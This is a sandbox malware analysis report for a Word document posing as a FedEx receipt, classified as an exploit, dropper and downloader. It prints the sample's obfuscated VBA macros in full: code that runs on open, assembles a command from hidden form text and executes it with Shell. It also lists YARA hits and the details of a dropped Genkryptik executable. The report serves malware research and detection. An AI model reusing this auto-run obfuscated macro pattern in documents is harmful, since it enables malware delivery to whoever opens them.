3692f99b...4ab2 | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Exploit, Dropper, Downloader

3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)


Word Document

Created at 2018-12-06 22:25:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "45 seconds" to "30 seconds" to reveal dormant functionality.

Filename Category Type Severity Actions
C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat Created File Text
Mime Type text/plain
File Size 0.41 KB
MD5 6281f5c42be41eaf431acc826cb8f1bf Copy to Clipboard
SHA1 75d4aa452b5c232a2f1d9e74ccd7d616d6d66171 Copy to Clipboard
SHA256 e2a20c742f2100307b7bc99b92cab49a3821bb1cef322284c3440a040a991de2 Copy to Clipboard
SSDeep 12:ssHARPuwtosKMzr+GCrSF2q0Fiiefh7Meiw1r9KMzrl:tHgPuwa6zrfCFi9h7H9zrl Copy to Clipboard
YARA Matches
Rule Name Rule Description Classification Severity Actions
PowerShell_Download_Commands PowerShell may attempt to download external content; possible dropper -
C:\Users\aETAdzjz\Desktop\receipt_FedEX_4028873.doc Sample File Word Document
Mime Type application/msword
File Size 198.50 KB
MD5 431399e17aee53fa70c23ac550792769 Copy to Clipboard
SHA1 562899367b8212c2aca639f6f6a68d5294971c94 Copy to Clipboard
SHA256 3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 Copy to Clipboard
SSDeep 3072:a57WssAb0KJ7vnVMIZRfw8z8N5Ygaw/ZX/PcSJqDmO6KQcsj1u:a1zsw7yIZJEYgaw/ZXM0kmtKQcsxu Copy to Clipboard
Office Information
Creator Enpor Support
Last Modified By user
Revision 7
Create Time 2018-12-06 13:12:00+00:00
Modify Time 2018-12-06 13:30:00+00:00
Document Information
Codepage Cryllic
Application Microsoft Office Word
App Version 12.0
Template Normal
Document Security SecurityFlag.NONE
Editing Time 480.0
Page Count 1
Line Count 1
Paragraph Count 1
Character Count 1
Chars With Spaces 1
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (3)
Macro #1: Module1
Attribute VB_Name = "Module1"
Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub

Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub

Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub

Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub

Sub doveryboll(m)
Dim n As Integer
Dim sadd As String
With UserForm1
sadd = "" + .ValidText
n = m - 502
End With
If m = 502 Then Shell sadd, n
End Sub

Sub ValidateOptionsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub

Sub CloseDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub

Sub date_now(ByRef b1, ByRef control, Cell1)
log2 = 1
With UserForm1
log2 = Len(.Text1)
If b1 < log2 Then
b = ""
doc_print_header .Text1, b1, b
If Cell1 <> b Then
b1 = b1 + 1
date_now b1, control, Cell1
control = b1
End If
End If
End With
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
date_now sb1, arg1, per2
End Sub

Macro #2: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
ValidateOptionsForm ("case")
End Sub

Macro #3: UserForm1
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3201CC22-4323-4EF3-8B9C-19E82082DC0D}{CD48F839-E45B-49E9-A956-2DBED7A8E4A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
End Sub

Private Sub CommandButton1_Click()

End Sub

Private Sub ValidText_Change()
Dim bol2 As Integer
bol2 = Len(UserForm1.ValidText)
Dim bol1 As String
bol1 = "V"
fh = "2"
doveryboll bol2
End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then CloseDateForm
End Sub

Private Sub ComboBox1_Change()

End Sub

YARA Matches
Rule Name Rule Description Classification Severity Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
VBA_Execution_Commands VBA macro may execute files or system commands -
C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe Created File Binary
Also Known As C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type application/x-dosexec
File Size 510.50 KB
MD5 94df3603fba467e0fff637c55c8b6d1b Copy to Clipboard
SHA1 93f6cd1834a402f78497d2978d3a3a58ec3bfd66 Copy to Clipboard
SHA256 4f9eb9ef4ef021679de344f227bc6e162f1e5bcc6950d63ee870718380c58016 Copy to Clipboard
SSDeep 12288:mw4zMV6fcJUCT+ZiO852/Ico+/fT3aBtYg:P8fcJUCTjOy2eGT36tx Copy to Clipboard
ImpHash 18da4215c6f786f6bd7fecba770e2636 Copy to Clipboard
File Reputation Information
First Seen 2018-12-06 21:48 (UTC+1)
Last Seen 2018-12-06 22:11 (UTC+1)
Names Win32.Exploit.Genkryptik
Families Genkryptik
Classification Exploit
PE Information
Image Base 0x400000
Entry Point 0x4014e0
Size Of Code 0x14e00
Size Of Initialized Data 0x7f600
Size Of Uninitialized Data 0x600
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2018-12-06 19:02:02+00:00
Version Information (9)
LegalCopyright -
InternalName -
CompanyName -
LegalTrademarks -
ProductName -
FileDescription Developed using the Dev-C++ IDE
OriginalFilename -
Sections (16)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x14c50 0x14e00 0x400 cnt_code, cnt_initialized_data, align_1bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_execute, mem_read 6.04
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.bss 0x41f000 0x478 0x0 0x0 cnt_uninitialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.0
.idata 0x420000 0xb70 0xc00 0x1d800 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 4.89
.CRT 0x421000 0x38 0x200 0x1e400 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.29
.tls 0x422000 0x20 0x200 0x1e600 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.23
.rsrc 0x423000 0x4c40c 0x4c600 0x1e800 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 7.75
/4 0x470000 0x338 0x400 0x6ae00 cnt_initialized_data, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read 1.89
/19 0x471000 0xd69d 0xd800 0x6b200 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 6.09
/31 0x47f000 0x1f2f 0x2000 0x78a00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 4.61
/45 0x481000 0x1ff5 0x2000 0x7aa00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 5.85
/57 0x483000 0xb84 0xc00 0x7ca00 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read 4.58
/70 0x484000 0x31c 0x400 0x7d600 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 4.28
/81 0x485000 0x19f2 0x1a00 0x7da00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 3.52
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Imports (2)
KERNEL32.dll (57)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddAtomA 0x0 0x4201d8 0x2003c 0x1d83c 0x3
CloseHandle 0x0 0x4201dc 0x20040 0x1d840 0x53
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CreateSemaphoreA 0x0 0x4201e8 0x2004c 0x1d84c 0xad
DeleteCriticalSection 0x0 0x4201ec 0x20050 0x1d850 0xd4
DuplicateHandle 0x0 0x4201f0 0x20054 0x1d854 0xea
EnterCriticalSection 0x0 0x4201f4 0x20058 0x1d858 0xef
FindAtomA 0x0 0x4201f8 0x2005c 0x1d85c 0x12e
FindResourceA 0x0 0x4201fc 0x20060 0x1d860 0x14d
GetAtomNameA 0x0 0x420200 0x20064 0x1d864 0x170
GetCurrentProcess 0x0 0x420204 0x20068 0x1d868 0x1c4
GetCurrentProcessId 0x0 0x420208 0x2006c 0x1d86c 0x1c5
GetCurrentThread 0x0 0x42020c 0x20070 0x1d870 0x1c8
GetCurrentThreadId 0x0 0x420210 0x20074 0x1d874 0x1c9
GetHandleInformation 0x0 0x420214 0x20078 0x1d878 0x200
GetLastError 0x0 0x420218 0x2007c 0x1d87c 0x203
GetProcessAffinityMask 0x0 0x42021c 0x20080 0x1d880 0x246
GetStartupInfoA 0x0 0x420220 0x20084 0x1d884 0x264
GetSystemTimeAsFileTime 0x0 0x420224 0x20088 0x1d888 0x27b
GetThreadContext 0x0 0x420228 0x2008c 0x1d88c 0x289
GetThreadPriority 0x0 0x42022c 0x20090 0x1d890 0x291
GetTickCount 0x0 0x420230 0x20094 0x1d894 0x297
InitializeCriticalSection 0x0 0x420234 0x20098 0x1d898 0x2eb
InterlockedCompareExchange 0x0 0x420238 0x2009c 0x1d89c 0x2f2
InterlockedDecrement 0x0 0x42023c 0x200a0 0x1d8a0 0x2f3
InterlockedExchange 0x0 0x420240 0x200a4 0x1d8a4 0x2f4
InterlockedExchangeAdd 0x0 0x420244 0x200a8 0x1d8a8 0x2f5
InterlockedIncrement 0x0 0x420248 0x200ac 0x1d8ac 0x2f7
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LockResource 0x0 0x420254 0x200b8 0x1d8b8 0x341
QueryPerformanceCounter 0x0 0x420258 0x200bc 0x1d8bc 0x393
ReleaseMutex 0x0 0x42025c 0x200c0 0x1d8c0 0x3be
ReleaseSemaphore 0x0 0x420260 0x200c4 0x1d8c4 0x3c2
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ResumeThread 0x0 0x420268 0x200cc 0x1d8cc 0x3d6
SetEvent 0x0 0x42026c 0x200d0 0x1d8d0 0x41d
SetLastError 0x0 0x420270 0x200d4 0x1d8d4 0x436
SetProcessAffinityMask 0x0 0x420274 0x200d8 0x1d8d8 0x441
SetThreadContext 0x0 0x420278 0x200dc 0x1d8dc 0x455
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SetUnhandledExceptionFilter 0x0 0x420280 0x200e4 0x1d8e4 0x467
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TerminateProcess 0x0 0x420290 0x200f4 0x1d8f4 0x482
TlsAlloc 0x0 0x420294 0x200f8 0x1d8f8 0x487
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TlsSetValue 0x0 0x42029c 0x20100 0x1d900 0x48a
TryEnterCriticalSection 0x0 0x4202a0 0x20104 0x1d904 0x491
UnhandledExceptionFilter 0x0 0x4202a4 0x20108 0x1d908 0x496
VirtualAlloc 0x0 0x4202a8 0x2010c 0x1d90c 0x4ad
VirtualProtect 0x0 0x4202ac 0x20110 0x1d910 0x4b6
VirtualQuery 0x0 0x4202b0 0x20114 0x1d914 0x4b9
WaitForMultipleObjects 0x0 0x4202b4 0x20118 0x1d918 0x4c0
WaitForSingleObject 0x0 0x4202b8 0x2011c 0x1d91c 0x4c2
msvcrt.dll (44)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
__dllonexit 0x0 0x4202c0 0x20124 0x1d924 0x37
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Icons (1)
C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe Created File Unknown
Also Known As C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type application/x-empty
File Size 0.00 KB
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
File Reputation Information
First Seen 2011-05-27 11:27 (UTC+2)
Last Seen 2017-04-19 12:47 (UTC+2)
c:\users\aetadzjz\appdata\local\temp\~df834800654bb3e1d0.tmp Created File Stream
Mime Type application/octet-stream
File Size 0.50 KB
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
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SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
File Reputation Information
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2018-11-10 05:26 (UTC+1)
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 Modified File Stream
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File Size 1.02 KB
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SHA256 93ae9406a7aa24438df790e980d86dbff3de11200c79ed935c3d9f66492fd7f0 Copy to Clipboard
SSDeep 24:NlzKf5b6U4Q7WebZY7e5n0DfFXVauU7IFFF4ZfpjU:n8b6U4sFEeOFXU7+34o Copy to Clipboard
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 Modified File Stream
Mime Type application/octet-stream
File Size 1.02 KB
MD5 3936b8254a3f80e60c3af26a41ed3e9f Copy to Clipboard
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SHA256 2029500e3c3a8c6a36b285b626b0b8072dc4647d9c18a3da10e8e40771c6c473 Copy to Clipboard
SSDeep 24:NlzKf5b6U4KrIjGoHyhYg9s2kqbycVg44d5mU:n8b6U4OIZHy+g9s/u044KU Copy to Clipboard
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File Size 1.04 KB
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SHA256 7d6e41456f3ecafc2546fd86a25b759b1bcddda9bf3b20197ec6c5955b99f1da Copy to Clipboard
SSDeep 24:LLKf5b6UWqapsa9IqOQ5Ua5XDb8E7w/IQAUWnPtoEX:Yb6UdNcXODwbz7LQAUgVN Copy to Clipboard
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Mime Type application/octet-stream
File Size 0.05 KB
MD5 64bc6b0e1d907ae8acf27bdb155344c2 Copy to Clipboard
SHA1 7aa0d9af2d61d73a044f288e16fdd07813c972ba Copy to Clipboard
SHA256 dd4e0b0b64da5d95420c0e5423726f109e820e18b8a0b602274a7404f16f3ab2 Copy to Clipboard
SSDeep 3:/lSll+:Ak Copy to Clipboard
Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
